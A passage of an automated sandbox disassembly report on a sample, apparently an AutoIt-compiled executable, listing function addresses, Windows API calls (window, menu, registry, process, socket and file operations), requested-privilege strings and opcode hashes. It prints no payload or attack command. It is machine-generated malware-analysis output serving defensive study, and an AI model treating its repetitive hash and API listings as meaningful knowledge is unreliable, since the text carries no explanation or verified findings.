                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                  • String ID:
                                                                  • API String ID: 395352322-0
                                                                  • Opcode ID: cd3ff994acf18ac0030b3eb258aaaf9379dd7e0edc2c0f55b5575216aff7bda1
                                                                  • Instruction ID: e9c81f596e7ad165f2f1eec78de3d6935c812671855b3e014451f7aec22ac016
                                                                  • Opcode Fuzzy Hash: cd3ff994acf18ac0030b3eb258aaaf9379dd7e0edc2c0f55b5575216aff7bda1
                                                                  • Instruction Fuzzy Hash: 1231CBB2901119BFDB169F94EC85AFFB7BCEF08304F00416AE612E6550DB749F499BA0
                                                                  Function 003B8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003B8FE7
                                                                  • GetWindowLongW.USER32(00FB0490,000000F0), ref: 003B901A
                                                                  • GetWindowLongW.USER32(00FB0490,000000F0), ref: 003B904F
                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003B9081
                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003B90AB
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 003B90BC
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003B90D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
                                                                  • Opcode ID: 98596faa9c8052d880b9a5ef4329a2d133b9d93f95137e97ed363301a900dee0
                                                                  • Instruction ID: 71a0a14d433f8b75edfdf435f96a9e3131fc87aa90e0098ed794a96ea7ff6f23
                                                                  • Opcode Fuzzy Hash: 98596faa9c8052d880b9a5ef4329a2d133b9d93f95137e97ed363301a900dee0
                                                                  • Instruction Fuzzy Hash: FA315734644215EFDB22DF58EC84FA437A9FB4A318F154166F7198F6B1CB72A840CB84
                                                                  Function 003908AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003908F2
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00390918
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0039091B
                                                                  • SysAllocString.OLEAUT32(?), ref: 00390939
                                                                  • SysFreeString.OLEAUT32(?), ref: 00390942
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00390967
                                                                  • SysAllocString.OLEAUT32(?), ref: 00390975
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 6249a10a36160119c7aaafa6bef47747cd7a989d4e1c3c58c728e9e6a35e52a0
                                                                  • Instruction ID: 3c4e7bf853e0c3fa00c6ec76130abab7f9738688925055bdc8b91fa5f3f81a6b
                                                                  • Opcode Fuzzy Hash: 6249a10a36160119c7aaafa6bef47747cd7a989d4e1c3c58c728e9e6a35e52a0
                                                                  • Instruction Fuzzy Hash: 7221B572601218AFAF119F6CDC88DBB77BCEB09360B008126F915DB161DB70ED41CB60
                                                                  Function 00392472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                  • API String ID: 1038674560-2734436370
                                                                  • Opcode ID: d0c114240920bdca6c811a77e47537994605e08b5da780fb8124421bb29aac9b
                                                                  • Instruction ID: aaa898aed6b85bc4bbbafb370a5ca8ef0934df2df105d4803d52ef80840c03e1
                                                                  • Opcode Fuzzy Hash: d0c114240920bdca6c811a77e47537994605e08b5da780fb8124421bb29aac9b
                                                                  • Instruction Fuzzy Hash: 54214C72104A5177CB33A636DC12FBBB39CEF66300F618025F84A9B186E6559D41C395
                                                                  Function 00390986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003909CB
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003909F1
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 003909F4
                                                                  • SysAllocString.OLEAUT32 ref: 00390A15
                                                                  • SysFreeString.OLEAUT32 ref: 00390A1E
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00390A38
                                                                  • SysAllocString.OLEAUT32(?), ref: 00390A46
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: ff325c950412eb9e4a449a4780e203420fcf435baec3dc1a49fa609415b896c5
                                                                  • Instruction ID: 954da8647b436397147ad8acec9c60596790348939bfd20b8063c7fb4ad8fd10
                                                                  • Opcode Fuzzy Hash: ff325c950412eb9e4a449a4780e203420fcf435baec3dc1a49fa609415b896c5
                                                                  • Instruction Fuzzy Hash: F0218675601204AFDF16DFA9DD88DAA77ECEF09360B018126F909CB2A5DA70EC418764
                                                                  Function 003BA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0036D1BA
                                                                    • Part of subcall function 0036D17C: GetStockObject.GDI32(00000011), ref: 0036D1CE
                                                                    • Part of subcall function 0036D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0036D1D8
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003BA32D
                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003BA33A
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003BA345
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003BA354
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003BA360
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 1025951953-3636473452
                                                                  • Opcode ID: 755baa688f9e9e9d90ff4288fe8fda68d04919945f3cc31ac0c904791738a6d3
                                                                  • Instruction ID: 45ddf92529fb27cdd4b161193f2092976874a3585ed8bfc0c2c3f23cc214a888
                                                                  • Opcode Fuzzy Hash: 755baa688f9e9e9d90ff4288fe8fda68d04919945f3cc31ac0c904791738a6d3
                                                                  • Instruction Fuzzy Hash: B611D0B1150219BEEF115F60CC85EEB7F6DFF08398F014115BB08A60A0C7729C21DBA4
                                                                  Function 0036CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 0036CCF6
                                                                  • GetWindowRect.USER32(?,?), ref: 0036CD37
                                                                  • ScreenToClient.USER32(?,?), ref: 0036CD5F
                                                                  • GetClientRect.USER32(?,?), ref: 0036CE8C
                                                                  • GetWindowRect.USER32(?,?), ref: 0036CEA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$Window$Screen
                                                                  • String ID:
                                                                  • API String ID: 1296646539-0
                                                                  • Opcode ID: 594327a950781e2e3e4cb66d2fc1a83ae76ec0d849a76be5f893784fb72e10f3
                                                                  • Instruction ID: 7716df47e6a9e4484374cdf036da6725520942f0d08ac75c2aa5c6e00f8bfdd4
                                                                  • Opcode Fuzzy Hash: 594327a950781e2e3e4cb66d2fc1a83ae76ec0d849a76be5f893784fb72e10f3
                                                                  • Instruction Fuzzy Hash: F5B15979910249DBDB11CFA8C480BEDBBB5FF08300F15D129EC99EB654DB31A950CBA4
                                                                  Function 003B1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 003B1C18
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 003B1C26
                                                                  • __wsplitpath.LIBCMT ref: 003B1C54
                                                                    • Part of subcall function 00371DFC: __wsplitpath_helper.LIBCMT ref: 00371E3C
                                                                  • _wcscat.LIBCMT ref: 003B1C69
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 003B1CDF
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 003B1CF1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                  • String ID:
                                                                  • API String ID: 1380811348-0
                                                                  • Opcode ID: 3fcdc0c72c413e4c4b146d8719794d797af9e4bc6c486e51653fd2d93baf752d
                                                                  • Instruction ID: 7d281ee0774aeb0a4e65435876c7be968c33790aa9ec1120a454e38f36333359
                                                                  • Opcode Fuzzy Hash: 3fcdc0c72c413e4c4b146d8719794d797af9e4bc6c486e51653fd2d93baf752d
                                                                  • Instruction Fuzzy Hash: 2C515D715043409FD722EF64D895EABB7ECEF88754F00491EF9899B2A1DB709A04CB92
                                                                  Function 003B2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003B3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B30AF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003B30EF
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003B3112
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003B313B
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003B317E
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 003B318B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                  • String ID:
                                                                  • API String ID: 3451389628-0
                                                                  • Opcode ID: 0cf67832577a5141d365812ec6a8766b0d00ebe543077ffecc4044ef78702af3
                                                                  • Instruction ID: ba3bb62bf8f92754ffefed021b316bb49c60e3e2489fc93bda1e20b8e1cdb59c
                                                                  • Opcode Fuzzy Hash: 0cf67832577a5141d365812ec6a8766b0d00ebe543077ffecc4044ef78702af3
                                                                  • Instruction Fuzzy Hash: 88514D31118310AFC716EF68C885EAABBF9FF89304F04491DFA558B1A1DB71DA09CB52
                                                                  Function 003B84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenu.USER32(?), ref: 003B8540
                                                                  • GetMenuItemCount.USER32(00000000), ref: 003B8577
                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003B859F
                                                                  • GetMenuItemID.USER32(?,?), ref: 003B860E
                                                                  • GetSubMenu.USER32(?,?), ref: 003B861C
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 003B866D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                  • String ID:
                                                                  • API String ID: 650687236-0
                                                                  • Opcode ID: 2dd78315d3c8d25ccdc0e4a6cc6042e38cb199bdb084d2dbfd1a3c3ce2a41e27
                                                                  • Instruction ID: 329265dc3b6d4fdfb099ee0af7767bc825ee036f8c156a137628fc8d8a979b13
                                                                  • Opcode Fuzzy Hash: 2dd78315d3c8d25ccdc0e4a6cc6042e38cb199bdb084d2dbfd1a3c3ce2a41e27
                                                                  • Instruction Fuzzy Hash: 52518B35A00219EFCF12EF64C841AEEB7F8AF48314F15445AEA16BB351CB30AE41CB90
                                                                  Function 00394AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00394B10
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00394B5B
                                                                  • IsMenu.USER32(00000000), ref: 00394B7B
                                                                  • CreatePopupMenu.USER32 ref: 00394BAF
                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00394C0D
                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00394C3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                  • String ID:
                                                                  • API String ID: 3311875123-0
                                                                  • Opcode ID: 0cecd7e260219a744896c1cdaff275a7e9aeff4a738f8dec41a6f618ed9df20d
                                                                  • Instruction ID: b431e218e07425ff3d7c022db9b12e8a941a8a970b33280d2c24b84a2865e026
                                                                  • Opcode Fuzzy Hash: 0cecd7e260219a744896c1cdaff275a7e9aeff4a738f8dec41a6f618ed9df20d
                                                                  • Instruction Fuzzy Hash: 3B51CE70602309EFDF26CF68D888FAEBBF8AF45318F148159E4659B291E3709946CF51
                                                                  Function 003A8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,003EDC00), ref: 003A8E7C
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8E89
                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 003A8EAD
                                                                  • #16.WSOCK32(?,?,00000000,00000000), ref: 003A8EC5
                                                                  • _strlen.LIBCMT ref: 003A8EF7
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8F6A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_strlenselect
                                                                  • String ID:
                                                                  • API String ID: 2217125717-0
                                                                  • Opcode ID: 1796d382e060b0cd8dd8ea0ce2bbb01b9847d151516b1648fe1339c6c08fcb0a
                                                                  • Instruction ID: 12456159738d9e49123fa70d5715a73cc8656e0a1740b05dbc3f9370b51ffb51
                                                                  • Opcode Fuzzy Hash: 1796d382e060b0cd8dd8ea0ce2bbb01b9847d151516b1648fe1339c6c08fcb0a
                                                                  • Instruction Fuzzy Hash: 5741C371500204AFCB1AEF64DD85EAEB7BDEF09314F104659F5169B291DF30AE04CB60
                                                                  Function 0036ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • BeginPaint.USER32(?,?,?), ref: 0036AC2A
                                                                  • GetWindowRect.USER32(?,?), ref: 0036AC8E
                                                                  • ScreenToClient.USER32(?,?), ref: 0036ACAB
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0036ACBC
                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 0036AD06
                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003CE673
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                  • String ID:
                                                                  • API String ID: 2592858361-0
                                                                  • Opcode ID: 13bb749cc2edc60860e22fac3d0cb677d930ec58c664b18236fba0fa898ca2cf
                                                                  • Instruction ID: 6a8863cd0f01e8669b4fe04fc17a2d011fffd164c91cc34bf957d4a439012396
                                                                  • Opcode Fuzzy Hash: 13bb749cc2edc60860e22fac3d0cb677d930ec58c664b18236fba0fa898ca2cf
                                                                  • Instruction Fuzzy Hash: E241AC71105701AFC712DF24DC84FAA7BACEB59320F148669FAA4DA2A5C731A844DF62
                                                                  Function 003BE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShowWindow.USER32(00411628,00000000,00411628,00000000,00000000,00411628,?,003CDC5D,00000000,?,00000000,00000000,00000000,?,003CDAD1,00000004), ref: 003BE40B
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 003BE42F
                                                                  • ShowWindow.USER32(00411628,00000000), ref: 003BE48F
                                                                  • ShowWindow.USER32(00000000,00000004), ref: 003BE4A1
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 003BE4C5
                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003BE4E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: fe7f396446544b628f15da4c8381cd977b0fee8b2d18689203a2c3b9a8724486
                                                                  • Instruction ID: a424c23811256d5adfca090d28497057b59fc937b0e54294c97d52d90ee8516e
                                                                  • Opcode Fuzzy Hash: fe7f396446544b628f15da4c8381cd977b0fee8b2d18689203a2c3b9a8724486
                                                                  • Instruction Fuzzy Hash: 46414C34601150EFDB23CF29D499BD47BF5BB09308F5981B9EA588FAA2C771E842CB51
                                                                  Function 003998BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 003998D1
                                                                    • Part of subcall function 0036F4EA: std::exception::exception.LIBCMT ref: 0036F51E
                                                                    • Part of subcall function 0036F4EA: __CxxThrowException@8.LIBCMT ref: 0036F533
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00399908
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00399924
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0039999E
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003999B3
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 003999D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
